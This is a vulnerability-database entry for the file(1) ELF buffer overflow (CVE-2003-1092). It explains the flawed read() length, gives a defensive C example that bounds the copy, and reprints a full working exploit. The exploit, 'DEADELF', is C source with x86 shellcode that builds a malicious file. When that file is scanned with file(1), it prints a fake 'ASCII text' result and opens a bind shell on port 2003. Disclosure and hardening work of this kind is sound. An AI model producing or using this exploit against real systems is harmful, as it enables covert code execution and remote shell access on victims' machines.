file Utility Local Buffer Overflow Vulnerability

Vulnerability ID: 1107234    Vulnerability type: Design error
Published: 2003-03-06    Updated: 2005-10-20
CVE ID: CVE-2003-1092
CNNVD ID: CNNVD-200312-187
Platform: Linux    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/22326
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-187
|Details
file(1) is a utility that identifies file types. The file(1) command contains a buffer overflow that a local attacker can use to execute arbitrary instructions on the system with the privileges of the user who runs it. The problem is in the doshn() call inside tryelf(), at line 587 of readelf.c:

    doshn(class, swap, fd, getu32(swap, elfhdr.e_shoff), getu16(swap, elfhdr.e_shnum), getu16(swap, elfhdr.e_shentsize));

The last argument of doshn(), 'elfhdr.e_shentsize', is later used as the length of the read() call at line 133 of readelf.c:

    if (read(fd, sh_addr, size) == -1)

That read() copies 'size' bytes into the 'sh_addr' variable defined at line 92 of readelf.c:

    #define sh_addr (class == ELFCLASS32 ? (void *)&sh32 : (void *)&sh64)

The buffer behind read() is only 0x20 (32) bytes, so a 'size' of 0x28 (40) bytes overwrites the saved EBP and EIP on the stack and allows arbitrary code to run with the privileges of the invoking user. An attacker can craft a malicious file and induce another user to analyse it with file(1); the resulting overflow executes arbitrary instructions with that user's privileges.
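The read() pattern described above, with the check it lacked. This is an added example, not the code of file(1) or of its fix: it walks the section-header table of an in-memory ELF image and copies each header into the same kind of fixed stack buffer (a union of Elf32_Shdr and Elf64_Shdr) that doshn() used, but only after requiring e_shentsize to equal the size of the structure it is read into and after checking that the whole table lies inside the file. The function names, the SH_* result codes and the constructed test image produced by build_elf32_image() are assumptions of this example; the structure definitions come from the host's <elf.h>, and the image is assumed to be in host (little-endian) byte order, so file(1)'s getu16()/getu32() byte swapping is omitted.

```c
#include <elf.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Result codes (assumed names for this example). */
enum {
    SH_OK            = 0,
    SH_BAD_CLASS     = -1,   /* EI_CLASS is neither ELFCLASS32 nor ELFCLASS64 */
    SH_BAD_SHENTSIZE = -2,   /* e_shentsize differs from the header struct size */
    SH_TRUNCATED     = -3,   /* section-header table does not fit in the file */
    SH_TOO_SHORT     = -4    /* image shorter than an ELF header */
};

/* Size a section header must have for the given EI_CLASS; 0 if unknown.
   Comparing the file's e_shentsize against this is the check the
   vulnerable doshn() did not perform before passing it to read(). */
size_t expected_shentsize(unsigned char elf_class)
{
    switch (elf_class) {
    case ELFCLASS32: return sizeof(Elf32_Shdr);
    case ELFCLASS64: return sizeof(Elf64_Shdr);
    default:         return 0;
    }
}

/* Walk the section-header table of an in-memory ELF image. Each header is
   copied into a fixed stack buffer exactly as file(1) did, but the copy
   length is the validated struct size, never the value taken from the file.
   Returns SH_OK or a negative SH_* code; *count receives the headers read. */
int walk_section_headers(const unsigned char *img, size_t len, unsigned *count)
{
    union { Elf32_Shdr sh32; Elf64_Shdr sh64; } sh;  /* the stack buffer */
    Elf32_Ehdr eh32;
    Elf64_Ehdr eh64;
    unsigned char elf_class;
    size_t want;
    uint64_t shoff;
    uint16_t shnum, shentsize, i;

    *count = 0;
    if (len < sizeof eh32)
        return SH_TOO_SHORT;

    elf_class = img[EI_CLASS];
    want = expected_shentsize(elf_class);
    if (want == 0)
        return SH_BAD_CLASS;

    if (elf_class == ELFCLASS32) {
        memcpy(&eh32, img, sizeof eh32);
        shoff = eh32.e_shoff; shnum = eh32.e_shnum; shentsize = eh32.e_shentsize;
    } else {
        if (len < sizeof eh64)
            return SH_TOO_SHORT;
        memcpy(&eh64, img, sizeof eh64);
        shoff = eh64.e_shoff; shnum = eh64.e_shnum; shentsize = eh64.e_shentsize;
    }

    /* The missing check: an entry size that is not exactly the struct size
       (for instance the 0xfff used in the exploit on this page) is rejected
       before a single byte is copied into the stack buffer. */
    if (shentsize != want)
        return SH_BAD_SHENTSIZE;

    /* Every header must lie entirely inside the image. */
    if (shnum != 0 && (shoff > len || (uint64_t)shnum * want > (uint64_t)len - shoff))
        return SH_TRUNCATED;

    for (i = 0; i < shnum; i++) {
        memcpy(&sh, img + (size_t)shoff + (size_t)i * want, want);  /* bounded by 'want' */
        (*count)++;
    }
    return SH_OK;
}

/* Constructed test input: a minimal ELF32 image (header plus one section
   header) whose e_shentsize and e_shnum are chosen by the caller.
   Returns the image length, or 0 if the output buffer is too small. */
size_t build_elf32_image(unsigned char *out, size_t cap, uint16_t shentsize, uint16_t shnum)
{
    Elf32_Ehdr eh;
    Elf32_Shdr shdr;
    size_t need = sizeof eh + sizeof shdr;

    if (cap < need)
        return 0;
    memset(&eh, 0, sizeof eh);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS]   = ELFCLASS32;
    eh.e_ident[EI_DATA]    = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type      = ET_REL;
    eh.e_machine   = EM_386;
    eh.e_version   = EV_CURRENT;
    eh.e_ehsize    = (uint16_t)sizeof eh;
    eh.e_shoff     = (uint32_t)sizeof eh;   /* table follows the header */
    eh.e_shnum     = shnum;
    eh.e_shentsize = shentsize;             /* the attacker-controlled value */
    memset(&shdr, 0, sizeof shdr);
    shdr.sh_type = SHT_PROGBITS;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &shdr, sizeof shdr);
    return need;
}

int main(void)
{
    unsigned char img[256];
    unsigned n;
    size_t len = build_elf32_image(img, sizeof img, 0xfff, 1);   /* oversized, as in the exploit */
    printf("e_shentsize=0xfff -> %d\n", walk_section_headers(img, len, &n));
    len = build_elf32_image(img, sizeof img, (uint16_t)sizeof(Elf32_Shdr), 1);
    printf("e_shentsize=%zu  -> %d, headers read=%u\n",
           sizeof(Elf32_Shdr), walk_section_headers(img, len, &n), n);
    return 0;
}
```

Note that glibc's Elf32_Shdr is 40 bytes, whereas the advisory's buffer in file-3.39 was 32 bytes; the check above compares against whatever the local structure size is, which is the invariant that matters: the byte count handed to read() or memcpy() must be derived from the destination, not from the file.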
|Exploit (EXP)
source: http://www.securityfocus.com/bid/7009/info

It has been reported that a memory allocation issue exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility.

/*
   __________________
   Black Sand Project
   __________________

   Created by CrZ [[email protected]] LimpidByte [lbyte.void.ru] /06.03.2003/

   Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt

   program name: DEADELF

   description: Exploit for file program <= 3.39

   info: program creates a file-exploit and when you
   run "file /path/to/this/file-exploit" a shell
   will open on port 2003.

   Usage: ./85deadelf <file-exploit> [return address]

   Example of work:

	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
	[crz@blacksand crz]$ ./85deadelf deadelf
	[+] Creating a evil file deadelf!
	[+] Using address of shellcode = 0xbfffbd40
	[crz@blacksand crz]$ file deadelf
	File: ASCII text
	[crz@blacksand crz]$ telnet localhost 2003
	Trying 127.0.0.1...
	Connected to blacksand (127.0.0.1).
	Escape character is '^]'.
	id;
	uid=500(crz) gid=500(crz) groups=500(crz)
	: command not found
	exit;
	Connection closed by foreign host.
	[crz@blacksand crz]$

   Tested against: file-3.37 (RedHat8.0)
		    file-3.38 (RedHat8.0)
*/


#include <fcntl.h>
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>     /* exit(), system() */
#include <string.h>
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* write(), close() */


void usage(char *prog) {

	printf("\nCreated by CrZ [[email protected]] Limpid Byte [lbyte.void.ru]\n");
	printf("Usage: %s <name of evil file> [return address]\n\n",prog);
	exit(0);
}

int main(int argc, char **argv) {
	
/* 
   a simple shellcode that show fake result of file program & bind
   shell on 2003 port by CrZ
*/
	
char shellcode[]=
	"\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
	"\x68\x01\x01\x0a\x0d\x68\x74\x65"
	"\x78\x74\x68\x43\x49\x49\x20\x68"
	"\x3a\x20\x41\x53\x68\x46\x69\x6c"
	"\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80"
        /* bind shell on 2003 port */
        "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
        "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
        "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
        "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
        "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
        "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
        "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
	
	int fd,i;
	Elf32_Ehdr elfhdr;
	unsigned long xret=0xbfffbd40;      /* default guessed address of the shellcode */
	char *evilfile="bl00mps";
	char tmp[100];
	
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%lx",&xret);
	
	printf("[+] Creating a evil file %s!\n",evilfile);
	printf("[+] Using address of shellcode = 0x%lx\n",xret);	
	
	snprintf(tmp,sizeof tmp,"echo>%s",evilfile);   /* create (or truncate) the output file */
	system(tmp);
	fd=open(evilfile,O_WRONLY);

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; /* type should be NOT ET_CORE (4) & NOT ET_EXEC (2) */
	sprintf((char *)elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); /* ELF32 FORMAT: magic, class, data, version */
	elfhdr.e_machine=1;
	elfhdr.e_version=1;
	elfhdr.e_entry=0;
	elfhdr.e_phoff=0;
	elfhdr.e_shoff=0;
	elfhdr.e_flags=0;
	elfhdr.e_ehsize=0;
	elfhdr.e_phentsize=0xfff; /* define size for read() */
	elfhdr.e_phnum=1; /* this is for stop for() loop when read() */
	elfhdr.e_shentsize=0xfff; /* define size for read() */
	elfhdr.e_shnum=1; /* this is for stop for() loop when read() */
	elfhdr.e_shstrndx=0;
	write(fd,&elfhdr,sizeof(elfhdr));
	
	for(i=0;i<20;i++) write(fd,&xret,4); /* write new return address */
	for(i=0;i<6000;i++) write(fd,"\x90",1); /* write nops */
	write(fd,shellcode,sizeof shellcode); /* write shellcode */

	close(fd);

	
	return 0;	
}
|References

Source: US-CERT Vulnerability Note: VU#100937
Name: VU#100937
Link: http://www.kb.cert.org/vuls/id/100937
Source: XF
Name: file-afctr-memory-allocation(11488)
Link: http://xforce.iss.net/xforce/xfdb/11488
Source: BID
Name: 7009
Link: http://www.securityfocus.com/bid/7009
Source: OPENPKG
Name: OpenPKG-SA-2003.017
Link: http://www.securityfocus.com/archive/1/313847
Source: NSFOCUS
Name: 4500
Link: http://www.nsfocus.net/vulndb/4500
